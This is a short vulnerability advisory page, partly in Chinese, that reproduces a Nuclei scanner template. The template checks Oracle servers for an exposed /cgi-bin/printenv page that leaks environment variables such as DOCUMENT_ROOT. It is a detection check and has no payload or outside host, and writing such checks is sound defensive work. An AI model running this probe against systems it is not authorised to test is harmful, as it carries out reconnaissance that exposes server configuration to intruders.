oracle-cgi-printenv: Oracle CGI printenv - Information Disclosure

日期: 2025-08-01 | 影响软件: oracle cgi printenv | POC: 已公开

漏洞描述

Oracle CGI printenv component is susceptible to an information disclosure vulnerability.

PoC代码[已公开]

id: oracle-cgi-printenv

info:
  name: Oracle CGI printenv - Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: Oracle CGI printenv component is susceptible to an information disclosure vulnerability.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/OracleCGIPrintEnv.java
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
  metadata:
    max-request: 1
  tags: exposure,oracle,config,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/printenv"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'DOCUMENT_ROOT="'

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b360439d4639fb09ab62423cfff1d9a9abd6303628497c40c9c5db4ed9b95ca602206ebab5f93a1ab0ced7d08d66a40229714b3bad37f1790b4ff59cdce437c98518:922c64590222798bb761d5b6d8e72950